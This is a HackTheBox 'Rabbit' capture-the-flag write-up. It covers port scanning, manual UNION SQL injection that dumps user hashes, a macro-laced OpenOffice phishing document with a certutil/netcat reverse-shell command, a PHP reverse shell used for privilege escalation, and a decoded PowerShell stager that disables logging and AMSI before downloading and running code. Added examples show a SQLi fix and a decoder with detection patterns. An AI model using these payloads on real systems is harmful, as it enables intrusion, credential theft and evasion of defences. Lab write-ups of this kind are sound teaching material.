HackTheBox- Rabbit Writeup


This week Rabbit retires on HTB. It’s one of my favorite boxes, so I decided to publish my first ever write-up. I just joined the awesome Secjuice writing team and will keep publishing my various articles here. So, stay tuned! :)

Recon and Enumeration

Let’s start our enumeration with nmap. It’s always a good practice to start with a full port scan followed by a version scan. I usually go with nmap -p- --min-rate=1000 -T5 target. It’s good for completing scans quickly in CTFs; however, it’s not a good technique to use in actual pentests.

~# nmap -p- -T5 --min-rate=1000 10.10.10.71 -oG rabbit.nmap

Starting Nmap 7.60 ( https://nmap.org ) at 2018-08-17 13:55 IST
Warning: 10.10.10.71 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.71
Host is up (0.14s latency).
Not shown: 64584 closed ports, 901 filtered ports
PORT      STATE SERVICE
25/tcp    open  smtp
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
389/tcp   open  ldap
443/tcp   open  https
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
587/tcp   open  submission
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
808/tcp   open  ccproxy-http
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3306/tcp  open  mysql
5722/tcp  open  msdfsr
5985/tcp  open  wsman
6001/tcp  open  X11:1
6002/tcp  open  X11:2
6003/tcp  open  X11:3
6004/tcp  open  X11:4
6005/tcp  open  X11:5
6006/tcp  open  X11:6
6007/tcp  open  X11:7
6008/tcp  open  X11:8
6010/tcp  open  x11
6011/tcp  open  x11
6142/tcp  open  aspentec-lm
8080/tcp  open  http-proxy
9389/tcp  open  adws
43376/tcp open  unknown
43378/tcp open  unknown
43380/tcp open  unknown
43418/tcp open  unknown
43421/tcp open  unknown
43437/tcp open  unknown
43445/tcp open  unknown
43479/tcp open  unknown
43481/tcp open  unknown
43493/tcp open  unknown
43495/tcp open  unknown
43504/tcp open  unknown
43521/tcp open  unknown
43529/tcp open  unknown
43545/tcp open  unknown
43561/tcp open  unknown
47001/tcp open  winrm
64327/tcp open  unknown
64337/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 184.75 seconds

That’s a lot of ports, ain’t it!? Damn you lkys3n. Let’s go ahead and do a version scan. I’ll skip the lower >10k ports (because I like taking risks). ;)

# nmap -p $(grep -Eo '[0-9]{1,4}/open' rabbit.nmap | cut -d '/' -f 1 | tr -s '\n' ',') -sC -sV 10.10.10.71

Starting Nmap 7.60 ( https://nmap.org ) at 2018-08-17 14:09 IST
Completed NSE at 14:12, 0.57s elapsed
Nmap scan report for 10.10.10.71
Host is up (0.15s latency).
Scanned at 2018-08-17 14:09:19 IST for 192s

PORT     STATE  SERVICE           VERSION
25/tcp   open   smtp              Microsoft Exchange smtpd
| smtp-commands: Rabbit.htb.local Hello [10.10.14.137], SIZE, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH NTLM, X-EXPS GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, XEXCH50, XRDST, XSHADOW,
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| smtp-ntlm-info:
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: RABBIT
|   DNS_Domain_Name: htb.local
|   DNS_Computer_Name: Rabbit.htb.local
|   DNS_Tree_Name: htb.local
|_  Product_Version: 6.1.7601
| ssl-cert: Subject: commonName=Rabbit
  ---------------------SNIP-------------------------

|_ssl-date: 2018-08-17T13:40:35+00:00; +4h59m59s from scanner time.
53/tcp   open   domain            Microsoft DNS 6.1.7601
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
80/tcp   open   http              Microsoft IIS httpd 7.5
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Microsoft-IIS/7.5
|_http-title: 403 - Forbidden: Access is denied.
88/tcp   open   kerberos-sec      Microsoft Windows Kerberos (server time: 2018-08-17 13:39:27Z)
135/tcp  open   msrpc             Microsoft Windows RPC
389/tcp  open   ldap              Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
443/tcp  open   ssl/http          Microsoft IIS httpd 7.5
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
| ssl-cert: Subject: commonName=Rabbit
 ---------------------------- SNIP------------------------
|_ssl-date: 2018-08-17T13:40:31+00:00; +4h59m59s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
445/tcp  open   microsoft-ds?
464/tcp  open   kpasswd5?
587/tcp  open   smtp              Microsoft Exchange smtpd
| smtp-commands: Rabbit.htb.local Hello [10.10.14.137], SIZE 10485760, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, AUTH GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING,
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT
| smtp-ntlm-info:
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: RABBIT
|   DNS_Domain_Name: htb.local
|   DNS_Computer_Name: Rabbit.htb.local
|   DNS_Tree_Name: htb.local
|_  Product_Version: 6.1.7601
|_ssl-date: 2018-08-17T13:40:36+00:00; +4h59m59s from scanner time.
593/tcp  open   ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open   ldapssl?
808/tcp  open   ccproxy-http?
3268/tcp open   ldap              Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open   globalcatLDAPssl?
3306/tcp open   mysql             MySQL 5.7.19
|_mysql-info: ERROR: Script execution failed (use -d to debug)
3376/tcp closed cdbroker
3378/tcp closed wsicopy
3380/tcp closed sns-channels
3418/tcp closed rnmap
3421/tcp closed bmap
3437/tcp closed autocueds
3445/tcp closed monp
3479/tcp closed twrpc
3481/tcp closed cleanerliverc
3493/tcp closed nut
3495/tcp closed seclayer-tcp
3504/tcp closed ironstorm
3521/tcp closed mc3ss
3529/tcp closed jboss-iiop-ssl
3545/tcp closed camac
3561/tcp closed bmc-onekey
4327/tcp closed jaxer-web
4337/tcp closed unknown
5722/tcp open   msrpc             Microsoft Windows RPC
5985/tcp open   http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6001/tcp open   ncacn_http        Microsoft Windows RPC over HTTP 1.0
6002/tcp open   ncacn_http        Microsoft Windows RPC over HTTP 1.0
6003/tcp open   ncacn_http        Microsoft Windows RPC over HTTP 1.0
6004/tcp open   ncacn_http        Microsoft Windows RPC over HTTP 1.0
6005/tcp open   msrpc             Microsoft Windows RPC
6006/tcp open   msrpc             Microsoft Windows RPC
6007/tcp open   msrpc             Microsoft Windows RPC
6008/tcp open   msrpc             Microsoft Windows RPC
6010/tcp open   ncacn_http        Microsoft Windows RPC over HTTP 1.0
6011/tcp open   msrpc             Microsoft Windows RPC
6142/tcp open   msrpc             Microsoft Windows RPC
7001/tcp closed afs3-callback
8080/tcp open   http              Apache httpd 2.4.27 ((Win64) PHP/5.6.31)
|_http-favicon: Unknown favicon MD5: 79E32EEA338FA735AD22D36104C4337A
| http-methods:
|   Supported Methods: GET POST OPTIONS HEAD TRACE
|_  Potentially risky methods: TRACE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.27 (Win64) PHP/5.6.31
|_http-title: Example
9389/tcp open   mc-nmf            .NET Message Framing
Service Info: Hosts: Rabbit.htb.local, RABBIT; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 4h59m58s, deviation: 0s, median: 4h59m58s
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 48647/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 54161/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 36588/udp): CLEAN (Timeout)
|   Check 4 (port 23183/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
|_smb2-time: Protocol negotiation failed (SMB2)
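
The closed 3376, 3378, ... 4327, 4337 and 7001 entries in the version scan are a side effect of the port-extraction one-liner: its regex is unanchored, so for a field such as 43376/open it matches only the last four digits. The Python below is an added example, not part of the original write-up; it reproduces that behaviour on a constructed grepable line and shows an anchored extraction (the sample line and function names are assumptions).

```python
import re

# Constructed sample of a "Ports:" line in nmap's grepable (-oG) layout,
# shortened to a handful of the ports listed in the full scan above.
GREPABLE = (
    "Host: 10.10.10.71 ()\tPorts: 25/open/tcp//smtp///, 80/open/tcp//http///, "
    "8080/open/tcp//http-proxy///, 43376/open/tcp/////, 64327/open/tcp/////, "
    "9999/filtered/tcp/////"
)


def ports_unanchored(text):
    """Mimics grep -Eo '[0-9]{1,4}/open' | cut -d/ -f1.

    Nothing stops the match from starting in the middle of a five-digit
    port, so 43376 is reported as 3376.
    """
    return [int(m.split("/")[0]) for m in re.findall(r"[0-9]{1,4}/open", text)]


def open_ports(text, max_port=65535):
    """Extracts whole port fields only.

    (?<!\\d) forbids a digit immediately before the match, so the number
    captured is always the complete port field.
    """
    found = re.findall(r"(?<!\d)(\d{1,5})/open/tcp", text)
    return [port for port in map(int, found) if port <= max_port]


def nmap_port_argument(ports):
    """Comma-joins ports for nmap -p without a trailing comma."""
    return ",".join(str(port) for port in ports)


if __name__ == "__main__":
    print("unanchored:", ports_unanchored(GREPABLE))
    print("anchored  :", open_ports(GREPABLE))
    print("below 10k :", nmap_port_argument(open_ports(GREPABLE, max_port=9999)))
```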

We get some info like the server’s FQDN, DNS, NetBIOS name etc. So I’ll begin my recon from the web services (that’s the trend, right?) as the web is the best attack vector. However, I wasted a ton of time on the other rabbit holes like the .NET framing service, MySQL bruteforce, SMB etc.

The IIS on port 80 returns a 403 forbidden error and the IIS server on https has just the default IIS page. But the Apache server on port 8080 seems interesting with a giant rabbit ASCII art (creepy 😣 ), so I start a dirsearch on port 443 and 8080.

# python3 dirsearch.py -u https://10.10.10.71/ -e aspx -f -t 20

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: aspx | Threads: 20 | Wordlist size: 441041

Error Log: /home/zadmin/Documents/wiz/dirsearch/logs/errors-18-08-17_14-29-45.log

Target: https://10.10.10.71/

[14:29:46] Starting: 
[14:29:52] 302 -  147B  - /public/  ->  https://10.10.10.71/owa/
[14:30:14] 302 -  147B  - /exchange/  ->  https://10.10.10.71/owa/
[14:30:30] 302 -  147B  - /Public/  ->  https://10.10.10.71/owa/
[14:31:24] 401 -   58B  - /rpc/
[14:31:58] 400 -   11B  - /%2Acheckout%2A.aspx
[14:32:41] 302 -    0B  - /owa/  ->  https://10.10.10.71/owa/auth/logon.aspx?url=https://10.10.10.71/owa/&reason=0

We see the directories redirected to /owa/ (Outlook Web App) and also a /rpc/ directory with basic auth enabled (smells like another rabbit hole), which I noted down for later.

# python3 dirsearch.py -u http://10.10.10.71:8080/ -e php -f -t 20

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: php | Threads: 20 | Wordlist size: 441041

Error Log: /home/zadmin/Documents/wiz/dirsearch/logs/errors-18-08-17_14-27-54.log

Target: http://10.10.10.71:8080/

[14:27:55] Starting: 
[14:27:56] 403 -  306B  - /cgi-bin/
[14:27:59] 200 -   73KB - /icons/
[14:30:16] 403 -  300B  - /%20/
[14:31:45] 200 -    6KB - /joomla/
[14:32:13] 403 -  312B  - /%2Acheckout%2A.php
[14:32:13] 403 -  309B  - /%2Acheckout%2A/
[14:34:40] 302 -    0B  - /complain/  ->  /complain/login.php
[14:35:23] 403 -  309B  - /phpmyadmin/

We see a few more juicy folders here: /cgi-bin/, /joomla/, /phpmyadmin/ as well as /complain/. I felt /complain was the odd one out, so I proceeded to check it out (tbh I had wasted time on joomla using joomscan and even scanned /cgi-bin/ which was stupid, I know).

Exploiting SQLi in Complain Management System

Complain register page

Challenge: Guess the password.

The complain page had a register provision, which I used to register a user and log in. After logging in, I spent a while manually checking each parameter for SQLi, but without any luck. Then I proceeded to download the source code and check it for any vulnerabilities (which is how I did it initially). Finally, I came across the id parameter in repo-detail.php:

<?php
$id = $_GET['id'];
//echo $id;
?>
<h3>Report - Admin View</h3>
--------------------SNIP-------------------
<?php
        $sql = "SELECT *
                        FROM tbl_$id
                        LIMIT 0,20";
        $result = dbQuery($sql);
        $i=0;
        while($row = dbFetchRow($result)) {
        //extract($row);
-------------------SNIP---------------------

As you can see, there’s no input sanitization, which leads to an easy SQLi. After a while, my friend told me that there’s a CVE for the same, which made me feel like a retard for not scrolling down while I was googling.
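
The flaw in repo-detail.php is that a request value becomes part of a table name, which a prepared statement cannot protect because identifiers cannot be bound as parameters. The Python below is an added example, not the application's code: it reproduces the same query shape against an in-memory SQLite database standing in for MySQL and puts an allowlist fix beside it (all table names, rows and function names are constructed for illustration).

```python
import sqlite3


def build_demo_db():
    """Creates constructed report tables plus an unrelated credentials table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE tbl_engineer (id INTEGER, title TEXT, status TEXT);
        INSERT INTO tbl_engineer VALUES (1, 'printer jam', 'open');
        CREATE TABLE tbl_customer (id INTEGER, title TEXT, status TEXT);
        INSERT INTO tbl_customer VALUES (1, 'late delivery', 'closed');
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'demo_user', 'demo_hash');
        """
    )
    return conn


def report_vulnerable(conn, report_id):
    """Same shape as the PHP above: the value is pasted into the table name."""
    sql = f"SELECT * FROM tbl_{report_id} LIMIT 0,20"
    return conn.execute(sql).fetchall()


def identifier_can_be_bound(conn):
    """Shows why 'just use a placeholder' fails for a table name."""
    try:
        conn.execute("SELECT * FROM ? LIMIT 0,20", ("tbl_engineer",))
        return True
    except sqlite3.OperationalError:
        return False


# Fixed mapping from the values the UI may send to real table names.
REPORT_TABLES = {"engineer": "tbl_engineer", "customer": "tbl_customer"}


def report_hardened(conn, report_id):
    """Only table names chosen by the server ever reach the SQL text."""
    table = REPORT_TABLES.get(report_id)
    if table is None:
        raise ValueError("unknown report id")
    # The remaining values are ordinary parameters and are bound normally.
    return conn.execute(f"SELECT * FROM {table} LIMIT ?, ?", (0, 20)).fetchall()


# Constructed input mirroring the UNION technique used later in this write-up.
INJECTED_ID = "engineer UNION ALL SELECT id, username, password FROM users --"

if __name__ == "__main__":
    db = build_demo_db()
    print("normal    :", report_vulnerable(db, "engineer"))
    print("injected  :", report_vulnerable(db, INJECTED_ID))
    print("bind table:", identifier_can_be_bound(db))
    try:
        report_hardened(db, INJECTED_ID)
    except ValueError as exc:
        print("hardened  : rejected,", exc)
```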

If you like manual SQLi (like me) then this is a good exercise for you, so let’s get started. However, if you prefer SQLmap you can do it as mentioned here — https://www.exploit-db.com/exploits/41131/ and skip to the next section. All my queries are relative to the URL:

http://10.10.10.71:8080/complain/view.php?mod=admin&view=repod&id=[SQLi]

The query id=engineer' throws an error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' LIMIT 0,20' at line 2

Next up we try to find the number of columns. As usual, I start from 10: id=engineer order by 10-- throws an error. Keep decrementing the value by 1 until you don’t see an error; at 7 you won’t see an error, which means there are 7 columns in the table.

Next we try to find the injectable column: id=engineer union all select 1,version(),3,user(),5,database(),7 --

You should see something similar to this:
SQLi

As you can see we got the output of version() which was in the 2nd column, so we’ll be using the 2nd column for our further queries.

Now let’s see all the schemas present: id=engineer union all select 1,schema_name,3,4,5,6,7 from information_schema.schemata --

Which displays the names:

schemas

The secret schema catches my eye first (intuition?). Let’s check it out. I’ll be using the hex-encoded value of “secret”, which is better than messing with quotes.

id=engineer union all select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema=0x736563726574 --

Tables-in-secret-1

Now let’s check out the columns in the table.

id=engineer union select all 1,column_name,3,4,5,6,7 from information_schema.columns where table_schema=0x736563726574 and table_name=0x5573657273 --

Columns in user table

Awesome! Now for the last step, credsssssssssssssss ❤

id=engineer union select 1,concat(username,0x7c,password),3,4,5,6,7 from secret.users --

Dumped-user-table

There we have it :D . Users and hashes. Since I use a VM I won’t make it suffer from cracking md5 hashes :p , so I’ll just use Crackstation.

Cracked-hashes

Logging into OWA and Getting a Shell

There we go, thanks to Crackstation. Now let’s use these to log in to OWA at https://10.10.10.71/owa/. I log in as Ariel first. I see 3 emails in the inbox:

Mail one (Administrator)
Please send your weekly TPS reports to management ASAP!

Mail two (Administrator)
The security team has deployed windows defender and PowerShell constrain mode as the default organization security standard.

Mail three (Administrator)
There has been a change in the allowed software. Help Desk has moved forward with deploying Open Office to everyone.

Also, there were a few emails in the deleted items section most of which were Ariel being pissed at OWA (Microsoft yay!) for not delivering all emails, however, there was this mail from Admin.

Please send your weekly TPS reports to Raziel ASAP.

So after wasting some time (a lot) by using the creds to authenticate to all the million services running, I came back to OWA, started searching about OpenOffice phishing and stuff, and came across this module in Metasploit: exploit/multi/misc/openoffice_document_macro. But the module only created an odt with a PowerShell payload, and as seen earlier there was a PowerShell constraint enabled on the server. So, after my failed Google attempts to find sources to generate an odt with cmd payloads, I downloaded OpenOffice and checked the file (you need to enable macros first).

Macros

So the PowerShell payload was just a one-liner command to download and execute a shell, not something complex (Yes, I’m dumb). So I changed it to:

cmd.exe /c certutil.exe  -f -split -urlcache  http://10.10.14.134/nc.exe C:\Windows\Temp\nc.exe && C:\Windows\Temp\nc.exe 10.10.14.134 443 -e cmd.exe 

Which just downloads nc.exe on the target and executes it. Then I sent the attachment to Raziel, whom we read about earlier.
mail

And then I waited…… for longgggggg time……. long as in watching a movie and returning (free vpn ftw!) and after countless attempts and digging up other rabbitholes meanwhile...

listening on [any] 443 ...
connect to [10.10.14.134] from rabbit.htb [10.10.10.71] 48538
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Program Files (x86)\OpenOffice 4\program>

I got a shell which died instantly. Anyway, after a few more tries I got a stable shell and the first flag.

Directory of C:\Users\Raziel\Desktop

11/13/2017  10:19 PM    <DIR>          .
11/13/2017  10:19 PM    <DIR>          ..
10/29/2017  10:07 AM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  25,645,821,952 bytes free

C:\Users\Raziel\Desktop> type user.txt
 type user.txt
---------Sorry bois, not today----------
C:\Users\Raziel\Desktop>

Onto NT AUTHORITY\SYSTEM

I usually follow this guide for privesc, https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/, which is one of the best. After a bit of enumeration without any success, I checked out the list of processes and their respective owners. You can use:

powershell -version 2 -c " & {Get-WmiObject -Query "'Select * from Win32_Process'" | where {$_.Name -notlike "'svchost*'"} | Select Name, Handle, @{Label="'Owner'";Expression={$_.GetOwner().User}} | ft -AutoSize }"

or wmic service where started=true get name, startname

-----------------------------SNIP--------------------
RemoteRegistry                       NT AUTHORITY\LocalService    
RpcEptMapper                         NT AUTHORITY\NetworkService  
RpcSs                                NT AUTHORITY\NetworkService  
SamSs                                LocalSystem                  
Schedule                             LocalSystem                  
SENS                                 LocalSystem                  
ShellHWDetection                     LocalSystem                  
Spooler                              LocalSystem                  
UxSms                                localSystem                  
vds                                  LocalSystem                  
VGAuthService                        LocalSystem                  
VMTools                              LocalSystem                  
VMware Physical Disk Helper Service  LocalSystem                  
VMwareCAFManagementAgentHost         LocalSystem                  
W32Time                              NT AUTHORITY\LocalService    
W3SVC                                LocalSystem                  
wampapache64                         LocalSystem                  
wampmysqld64                         LocalSystem                  
WAS                                  LocalSystem                  
WinHttpAutoProxySvc                  NT AUTHORITY\LocalService    
Winmgmt                              localSystem                  
WinRM                                NT AUTHORITY\NetworkService  
WPDBusEnum                           LocalSystem                  
wuauserv                             LocalSystem

Ha! Did you spot it? Both Apache and MySQL are running as root (LocalSystem).

Privesc through Apache

We have write access to the Apache web root in C:\wamp64\www

C:\wamp64\www>cacls .
cacls .
C:\wamp64\www NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F 
              BUILTIN\Administrators:(OI)(CI)(ID)F 
              BUILTIN\Users:(OI)(CI)(ID)R 
              BUILTIN\Users:(CI)(ID)(special        access:)
                                   FILE_APPEND_DATA
 
              BUILTIN\Users:(CI)(ID)(special access:)
                                    FILE_WRITE_DATA
 
              CREATOR OWNER:(OI)(CI)(IO)(ID)F

What are we waiting for? Let’s place a reverse PHP shell there. I used a stupid PHP script.

<?php
system('C:\Windows\Temp\nc.exe 10.10.14.134 53 -e cmd.exe');
?>

Admin-shell

Et Voila!

Privesc through Schtasks

During my enumeration, I came across this schtask “System Maintenance”.

C:\>schtasks /query /fo LIST 2>nul | findstr TaskName                                                                                                
schtasks /query /fo LIST 2>nul | findstr TaskName                                                                                                    
TaskName:      \CleanUp                                                                                                                              
TaskName:      \Delete Files                                                                                                                         
TaskName:      \Delete Sent Items Ariel                                                                                                              
TaskName:      \Delete Sent Items Kain                                                                                                               
TaskName:      \Delete Sent Items Magnus                                                                                                             
TaskName:      \Download Email Attachments                                                                                                           
TaskName:      \Execute Malicious Documents                                                                                                          
TaskName:      \System Maintenance                                                                                                                   
--------------------------SNIP-------------------

After I got root, I decided to check it out.

C:\>schtasks /query /v /fo list /tn "\System Maintenance"                                                                                            
schtasks /query /v /fo list /tn "\System Maintenance"                                                                                                
                                                                                                                                                     
Folder: \                                                                                                                                            
HostName:                             RABBIT                                                                                                         
TaskName:                             \System Maintenance                                                                                            
Next Run Time:                        8/18/2018 5:42:55 PM                                                                                           
Status:                               Ready                                                                                                          
Logon Mode:                           Interactive only                                                                                               
Last Run Time:                        8/18/2018 4:42:14 PM                                                                                           
Last Result:                          0                                                                                                              
Author:                               HTB\Administrator                                                                                              
Task To Run:                          cmd.exe /c C:\Users\Raziel\AppData\Local\Temp\xyz\test.bat                                                     
Start In:                             N/A                                                                                                            
Comment:                              N/A                                                                                                            
Scheduled Task State:                 Enabled                                                                                                        
Idle Time:                            Disabled                                                                                                       
Power Management:                     Stop On Battery Mode, No Start On Batteries                                                                    
Run As User:                          HTB\Raziel                                                                                                     
Delete Task If Not Rescheduled:       Enabled                                                                                                        
Stop Task If Runs X Hours and X Mins: Disabled                                                                                                       
Schedule:                             Scheduling data is not available in this format.                                                               
Schedule Type:                        Daily                                                                                                          
Start Time:                           12:00:00 PM                                                                                                    
Start Date:                           11/16/2017                                                                                                     
End Date:                             N/A                                                                                                            
Days:                                 Every 1 day(s)                                                                                                 
Months:                               N/A                                                                                                            
Repeat: Every:                        1 Hour(s), 0 Minute(s)                                                                                         
Repeat: Until: Time:                  None                                                                                                           
Repeat: Until: Duration:              Disabled                                                                                                       
Repeat: Stop If Still Running:        Disabled

Interesting, the author is Administrator. Let’s see what the file contents are:

powershell -version 2 -exec bypass -noP -sta -w 1 -enc  SQBGACgAJABQAFMAVgBFAHIAUwBpAG8AbgBUAEEAQgBMAGUALgBQAFMAVgBlAFIAUwBJAG8AbgAuAE0AYQBKAG8AUgAgAC0ARwBFACAAMwApAHsAJABHAFAARgA9AFsAcgBFAEYAXQAuAEEAcwBTAGUAbQBiAGwAWQAuAEcAZQB0AFQAeQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAdABGAGkAZQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAEIAWABv
------------SNIP------------
AFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAcwBlAHIAPQAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgA6ADQANAAzACcAOwAkAHQAPQAnAC8AYQBkAG0AaQBuAC8AZwBlAHQALgBwAGgAcAAnADsAJABXAGMALgBIAGUAYQBEAGUAUgBTAC4AQQBEAEQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHMAZQBzAHMAaQBvAQQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA

Woah! A base64 encoded PowerShell command, which reduces to this:

IF($PSVErSionTABLe.PSVeRSIon.MaJoR -GE 3){$GPF=[rEF].AsSemblY.GetTyPe('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings','N'+'onPublic,Static');IF($GPF){$GPC=$GPF.GEtValuE($NUlL);If($GPC['ScriptB'+'lockLogging']){$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$GPC['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$VAl=[CoLLECTIons.GENERIc.DictiONArY[STRiNG,SyStEM.ObJeCt]]::New();$vAl.ADd('EnableScriptB'+'lockLogging',0);$VAl.ADD('EnableScriptBlockInvocationLogging',0);$GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$val}ELSE{[SCriPTBlOck]."GeTFiE`Ld"('signatures','N'+'onPublic,Static').SeTVAlUE($NUlL,(NeW-OBJECt COLlecTioNs.GeNErIC.HASHSet[STrINg]))}[REf].ASsEmBLy.GEtTyPE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GEtFIelD('amsiInitFailed','NonPublic,Static').SetVALuE($NulL,$TruE)};};[SySteM.NET.SERVIcEPoINtMANaGER]::ExpECt100COntInUE=0;$wc=New-ObJECT SySTeM.Net.WEbCLieNT;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$Wc.HEaDErs.Add('User-Agent',$u);$WC.ProXY=[SYsTeM.NET.WebREQUEst]::DEfAultWebProXy;$WC.PRoXy.CReDEnTialS = [SYstEm.NeT.CreDEntIaLCache]::DeFAuLTNeTwORKCredeNTials;$Script:Proxy = $wc.Proxy;$K=[SysTeM.TexT.EncOdInG]::ASCII.GeTBYTes('x6yd57j*0|QvlZwkBOIrmMs_#)t{!X-L');$R={$D,$K=$ARGs;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CoUnt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-BXoR$S[($S[$I]+$S[$H])%256]}};$ser='http://10.10.14.2:443';$t='/admin/get.php';$Wc.HeaDeRS.ADD("Cookie","session=Gki9ETjK1a2y70BsQD8O4qz4TBY=");$daTA=$WC.DOWNloADData($ser+$t);$iV=$datA[0..3];$DATA=$data[4..$datA.leNGTH];-join[ChAR[]](& $R $DAtA ($IV+$K))|IEX
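
For triage, the step from the -enc blob to the readable script is base64 followed by UTF-16LE decoding, and the decoded text then has to be normalised before keyword matching because this stager splits strings ('ScriptB'+'lockLogging') and inserts backticks. The Python below is an added example, not from the original write-up; the sample script is constructed from short fragments of the decoded command above, and the indicator names and patterns are assumptions chosen for illustration.

```python
import base64
import re

# Constructed, non-functional sample built from fragments of the decoded text.
SAMPLE_SCRIPT = (
    "$GPC['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
    "GEtFIelD('amsiInitFailed','N'+'onPublic,Static');"
    "$daTA=$WC.DOWNloADData($ser+$t);$daTA|IEX"
)
SAMPLE_CMDLINE = (
    "powershell -version 2 -exec bypass -noP -sta -w 1 -enc "
    + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
)


def extract_encoded(cmdline):
    """Returns the argument of -EncodedCommand or any accepted abbreviation.

    PowerShell accepts prefixes such as -e, -en and -enc (and the alias -ec),
    so the flag is compared as a prefix; -exec does not qualify.
    """
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        name = flag.lstrip("-/").lower()
        if flag[0] in "-/" and name and (
            "encodedcommand".startswith(name) or name == "ec"
        ):
            return value
    return None


def decode_encoded(b64):
    """Base64 -> UTF-16LE text, tolerating blobs cut short in a log line."""
    b64 = b64.rstrip("=")
    if len(b64) % 4 == 1:          # a single leftover character carries no byte
        b64 = b64[:-1]
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    return raw.decode("utf-16-le", errors="replace")


def normalise(script):
    """Undoes the trivial obfuscation seen above before matching."""
    script = re.sub(r"['\"]\s*\+\s*['\"]", "", script)   # 'a'+'b' -> 'ab'
    return script.replace("`", "").lower()               # GetFie`ld -> getfield


INDICATORS = {
    "script block logging tampering": r"enablescriptblock(invocation)?logging",
    "AMSI tampering": r"amsiinitfailed",
    "download call": r"\.download(data|string|file)\(",
    "dynamic execution": r"\|\s*(iex|invoke-expression)\b",
}


def triage(cmdline):
    """Returns (decoded_script, matched_indicator_names) for one command line."""
    blob = extract_encoded(cmdline)
    if blob is None:
        return None, []
    decoded = decode_encoded(blob)
    flat = normalise(decoded)
    hits = [name for name, pattern in INDICATORS.items() if re.search(pattern, flat)]
    return decoded, hits


if __name__ == "__main__":
    text, findings = triage(SAMPLE_CMDLINE)
    print(text)
    print(findings)
```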

